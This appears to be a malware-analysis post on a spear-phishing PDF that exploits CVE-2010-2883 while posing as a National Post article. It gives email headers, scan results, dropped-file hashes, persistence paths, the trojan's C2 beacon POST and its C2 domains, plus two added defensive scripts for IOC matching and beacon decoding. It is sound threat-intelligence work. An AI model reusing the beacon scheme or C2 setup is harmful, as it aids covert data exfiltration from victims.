Common Vulnerabilities and Exposures
CVE-2010-2883 Stack-based buffer overflow in CoolType.dll in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a PDF document with a long field in a Smart INdependent Glyphlets (SING) table in a TTF font, as exploited in the wild in September 2010.
General File Information
MD5 8E633588B3EE59DE09FE126D99869D2D
SIZE 103981 bytes
EXPLOIT TYPE CVE-2010-2883
FILE NAME Bin Ladens successor.pdf
Post Updates
The file uses the Fonts/SING CVE-2010-2883 exploit, which does not appear to be Metasploit-generated.
The sender often uses compromised servers of different organizations:
* Jan 12 CVE-2010-3654 + CVE-2009-4324 + CVE-2009-0927 + CVE-2008-0655 PDF JANUARY 2011 from a compromised Thai Police account
* Jan 6 CVE-2010-3333 DOC with info theft trojan from the American Chamber of Commerce
It is unclear whether this time it is a compromised server or whether the attacker uses this internet provider's services as a customer.
Beyond the Network America, Inc. (BTNaccess) is a wholly owned subsidiary of PCCW, and is headquartered in Reston, Virginia and Hong Kong with offices in Los Angeles, New York City, Philadelphia, Houston, London, Moscow, Prague, Kuala Lumpur, Singapore, Shenzhen, Tokyo, Mumbai and New Delhi.
PCCW, a global leader in next generation broadband solutions, is the largest telecommunications provider in Hong Kong. PCCW is the operator of one of the world’s most advanced broadband networks and has over 700,000 broadband customers and 12,500 employees worldwide. As a global player, PCCW has portrayed innovation within the industry and demonstrated financial stability with 2003 revenues reaching US$2.89 billion.
Original Message
-----Original Message-----
From: Peter Goodspeed [mailto:gpeter@nationalpost.com]
Sent: Monday, May 16, 2011 10:02 PM
To: xxxxxxxxxxx
Subject: Bin Laden’s successor may launch new strike
Dear,
Wellcome to Subscribe our Journals.Please find attached the analysis
of "Bin Laden’s successor may launch new strike".
Best regards,
National Post
Peter Goodspeed
1450 Don Mills Road, Suite 300
Don Mills, Ontario
Canada
M3B 3R5
___________________________
Message Headers
Received: (qmail 10512 invoked from network); 17 May 2011 02:00:58 -0000
Received: from unknown (HELO nationalpost.com) (63.221.138.44)
by xxxxxxxxxx with SMTP; 17 May 2011 02:00:58 -0000
From: "Peter Goodspeed"
Subject: Bin =?GB2312?B?TGFkZW6hr3M=?= successor may launch new strike
To: xxxxxxxxxxxxxxxx
Content-Type: multipart/mixed;
boundary="=_NextPart_2rfkindysadvnqw3nerasdf"; charset="GB2312"
MIME-Version: 1.0
Reply-To: gpeter@nationalpost.com
Date: Tue, 17 May 2011 10:01:40 +0800
X-Priority: 3
X-Mailer: FoxMail 3.11 Release [cn]
_____________________________________
Sender IP
Beyond the Network America in Hong Kong
63.221.138.4
Host reachable, 252 ms. average
63.216.0.0 - 63.223.255.255
Beyond The Network America, Inc.
450 Springpark PL
Suite 100
Herdon
VA
20170
United States
Downes, Chris
+1-703-621-1619
cdownes@pccwglobal.com
PCCW US NOC
+1-703-621-1637
usnoc@pccwglobal.com
PCCW AUP Department
+1-703-621-1637
abuse.ops@pccwglobal.com
Hostname: 63.221.138.4
ISP: Beyond The Network America
Organization: Beyond The Network America
Proxy: None detected
Type: Corporate
Assignment: Static IP
Blacklist:
Geolocation Information
Country: Hong Kong
City: Hong Kong
Nationalpost.com was spoofed; the domain is actually hosted in Canada:
nationalpost.com
199.71.40.135
goto.canada.com
Info:
Postmedia Network Inc.
Peter deGroot
1450 Don Mills Rd.
Toronto, ON M3B 2X7
CAN
Phone: 1 905 3042195 ()
Fax..: 1 905 3042195
Email: Webnames@postmedia.com
Automated Scans
File name: Bin Laden
http://www.virustotal.com/file-scan/report.html?id=d9493b6243a0378859610748590de21dc4df36c287197fde13c507d3895f8be6-1306841333
Submission date: 2011-05-31 11:28:53 (UTC)
Result: 16/ 42 (38.1%)
AntiVir 7.11.8.205 2011.05.31 EXP/CVE-2010-2883.F
Antiy-AVL 2.0.3.7 2011.05.31 Exploit/Win32.Pidief
Avast 4.8.1351.0 2011.05.31 JS:Pdfka-gen
Avast5 5.0.677.0 2011.05.31 JS:Pdfka-gen
ClamAV 0.97.0.0 2011.05.31 PUA.Script.PDF.EmbeddedJS
Commtouch 5.3.2.6 2011.05.31 PDF/Obfusc.J!Camelot
Comodo 8902 2011.05.31 UnclassifiedMalware
DrWeb 5.0.2.03300 2011.05.31 Exploit.PDF.2197
eTrust-Vet 36.1.8358 2011.05.31 PDF/Pidief!generic
F-Prot 4.6.2.117 2011.05.30 JS/ShellCode.DF.gen
Fortinet 4.2.257.0 2011.05.31 PDF/CoolType!exploit.CVE20102883
GData 22 2011.05.31 JS:Pdfka-gen
Ikarus T3.1.1.104.0 2011.05.31 Exploit.PDF
Microsoft 1.6903 2011.05.31 Exploit:Win32/CVE-2010-2883.A
Sophos 4.65.0 2011.05.31 Mal/PDFJs-Z
MD5 : 8e633588b3ee59de09fe126d99869d2d
Created files and traffic
The payload is the same type of trojan described
Created files
C:\Documents and Settings\mila\Local Settings\Application Data\Windows\userinit.dll MD5: 5D4877E3603149372CA210A8D2B60492
C:\Documents and Settings\mila\Local Settings\Application Data\Windows\userinit.exe MD5: 4353E469D8B4A7BAE876C81D3CAAA0D1
C:\Documents and Settings\mila\Start Menu\Programs\Startup\userinit.exe MD5: 4353E469D8B4A7BAE876C81D3CAAA0D1
C:\Documents and Settings\All Users\Application Data\desktop.BIN MD5: 4353E469D8B4A7BAE876C81D3CAAA0D1
The traffic is also analyzed in the mentioned post.
# Persistence is achieved by relaunching the binary from the infected user's startup folder (Start Menu\Programs\Startup\userinit.exe); a copy of the file is also created as All Users\Application Data\desktop.BIN.
# Userinit.exe creates a folder named Logs in %userprofile%\Local Settings\Application Data\Windows\Logs. A shortcut like the one in the image below appears in that directory for a split second, but I did not capture it. This is the file that gets transmitted with HTTP POST; MDAwMGhIRUwuMDk in the meta part of the URL string decodes to meta=0000hHEL.09
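The following is an added example (not code from the original post) showing how a responder can sweep a file snapshot for the persistence artefacts listed above. It takes a mapping of path to file bytes, so it runs over a sandbox dump, a mounted profile or an in-memory fixture, and flags entries whose MD5 matches the hashes from the "Created files" list or whose path matches the startup-folder, dropped-copy, desktop.BIN or Logs locations named in this post. The sample snapshot and its placeholder file contents are constructed; only the MD5 values and paths come from the post.

```python
"""Offline IOC sweep for the persistence artefacts described in this post.

Added example, not part of the original post. Matches a path -> bytes snapshot
against the MD5 and path indicators listed above.
"""
import hashlib
import os
import re
from dataclasses import dataclass, field

# MD5 indicators taken from the "Created files" list in the post.
IOC_MD5 = {
    "5d4877e3603149372ca210a8d2b60492": "userinit.dll (dropped DLL)",
    "4353e469d8b4a7bae876c81d3caaa0d1": "userinit.exe / desktop.BIN (dropper)",
}

# Path indicators: regexes over a normalised (forward-slash, lower-case) path.
# The Logs directory is included because the post names it as the staging
# location for the data sent by HTTP POST.
IOC_PATH = [
    (re.compile(r"/start menu/programs/startup/userinit\.exe$"), "startup-folder persistence"),
    (re.compile(r"/local settings/application data/windows/userinit\.(exe|dll)$"), "dropped userinit copy"),
    (re.compile(r"/all users/application data/desktop\.bin$"), "backup copy desktop.BIN"),
    (re.compile(r"/local settings/application data/windows/logs(/|$)"), "log staging directory"),
]


@dataclass
class Hit:
    path: str
    md5: str
    reasons: list = field(default_factory=list)


def normalise(path: str) -> str:
    """Windows paths to forward slashes and lower case so regexes are stable."""
    return path.replace("\\", "/").lower()


def match_iocs(snapshot: dict) -> list:
    """snapshot maps a path to the file's bytes; returns one Hit per matching file."""
    hits = []
    for path, data in snapshot.items():
        digest = hashlib.md5(data).hexdigest()
        reasons = []
        if digest in IOC_MD5:
            reasons.append("hash: " + IOC_MD5[digest])
        norm = normalise(path)
        for pattern, label in IOC_PATH:
            if pattern.search(norm):
                reasons.append("path: " + label)
        if reasons:
            hits.append(Hit(path, digest, reasons))
    return hits


def snapshot_tree(root: str) -> dict:
    """Build a snapshot from a directory on disk, e.g. a mounted user profile."""
    snap = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                snap[full] = fh.read()
    return snap


if __name__ == "__main__":
    # Constructed sample snapshot: the contents are placeholders, so only the
    # path indicators fire here; a real sample would also match on MD5.
    sample = {
        r"C:\Documents and Settings\mila\Start Menu\Programs\Startup\userinit.exe": b"MZ-placeholder",
        r"C:\Documents and Settings\All Users\Application Data\desktop.BIN": b"MZ-placeholder",
        r"C:\Documents and Settings\mila\My Documents\notes.txt": b"benign",
    }
    for hit in match_iocs(sample):
        print(hit.path, hit.md5, hit.reasons)
```

Matching on both hash and path matters here: the dropper recompiled with a different hash would still land in the startup folder, while a renamed copy elsewhere would still carry the known MD5.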
POST /windowsupdatev7/search%3Fhl%3DSABBAE4AUwA%3D%26q%3DMQA5ADIALgAxADYAOAAuADIALgAyAA%3D%3D%26meta%3DMDAwMGhIRUwuMDk%3D%26id%3Dlfdxfircvscxggb HTTP/1.1
The last part, lfdxfircvscxggb, changes with each GET request and is possibly an encoded directory name on the victim PC.
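As an added example (not from the original post), the decoder below takes the beacon path above apart: it unquotes the URL-encoded query that the trojan packs into the path, splits the parameters, base64-decodes each value and, when the decoded bytes look like UTF-16LE (every second byte is zero), decodes them as such. It generalises the meta decoding the post does by hand to the other parameters; the id value is not base64 and is returned as-is. The constant is the captured path with the line-wrap spaces removed.

```python
"""Decoder for the beacon URL in this post (added example, not the post's code).

The C2 request packs its query into the path with URL encoding, and each
parameter value is base64; some values are UTF-16LE text before encoding.
"""
import base64
import binascii
from urllib.parse import unquote

# Beacon path as captured in the post (line-wrap spaces removed).
BEACON_PATH = (
    "/windowsupdatev7/search%3Fhl%3DSABBAE4AUwA%3D%26q%3DMQA5ADIALgAxADYAOAAuADIALgAyAA"
    "%3D%3D%26meta%3DMDAwMGhIRUwuMDk%3D%26id%3Dlfdxfircvscxggb"
)


def decode_value(raw: str) -> str:
    """Base64-decode one parameter value; return the text unchanged if it is not base64."""
    try:
        data = base64.b64decode(raw, validate=True)
    except (binascii.Error, ValueError):
        return raw
    # UTF-16LE text from a Windows client shows up as a zero in every odd byte.
    if len(data) >= 2 and len(data) % 2 == 0 and all(b == 0 for b in data[1::2]):
        return data.decode("utf-16-le")
    try:
        return data.decode("ascii")
    except UnicodeDecodeError:
        return data.decode("latin-1")


def decode_beacon(path: str) -> dict:
    """Return the route plus every query parameter, decoded."""
    clean = unquote("".join(path.split()))  # drop stray whitespace, then unquote
    route, _, query = clean.partition("?")
    params = {"_route": route}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params[key] = decode_value(value)
    return params


if __name__ == "__main__":
    for key, value in decode_beacon(BEACON_PATH).items():
        print(f"{key} = {value}")
```

Running it on the captured path yields the route and four parameters; the q value decodes to a private IPv4 address, consistent with the trojan reporting the sandbox host's local address, and meta decodes to the 0000hHEL.09 value the post already identified.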
C2 information
DNS queries and traffic to
www.offlinewebpage.com
58.68.224.22
58.68.224.22 HTTP POST /qduxwfnfozvsrtkjprepggxrpnrvyst.htm HTTP/1.1
Reverse IP Lookup Results—3 domains hosted on IP address 58.68.224.22
Web Site
live-facebook.com
live-msn.net
offlinewebpage.com
Domain name: OFFLINEWEBPAGE.COM
Updated Date: 2010-10-05
Creation Date: 2010-10-05
Expiration Date: 2012-10-05
Registrant:
david Boulevard
No.17 Ren Rd. zonn District, fifa, akai 116001
bb aa 116001
Phone: +86.075184562547 Fax: +86.075184562547
Administrative Contact:
david Boulevard new delphi qingwa20112011@163.com
No.17 Ren Rd. zonn District, fifa, akai 116001
Registrar of Record: NAME2HOST, INC.
Domain servers in listed order:
DNS1.51.NET 118.144.82.171
DNS2.51.NET 118.145.1.7
IP Address History
Event Date Action Pre-Action IP Post-Action IP
2010-10-06 New -none- 127.0.0.1
2011-03-18 Change 127.0.0.1 58.68.224.22
2011-04-10 New -none- 58.68.224.22
Traffic to
msn.offlinewebpage.com
114.248.80.32
inetnum: 114.240.0.0 - 114.255.255.255
Hostname: 114.248.80.32
ISP: China Unicom Beijing Province Network
Organization: China Unicom Beijing Province Network
Proxy: None detected
Type: Broadband
Assignment: Static IP
Country: China
State/Region: Beijing
City: Beijing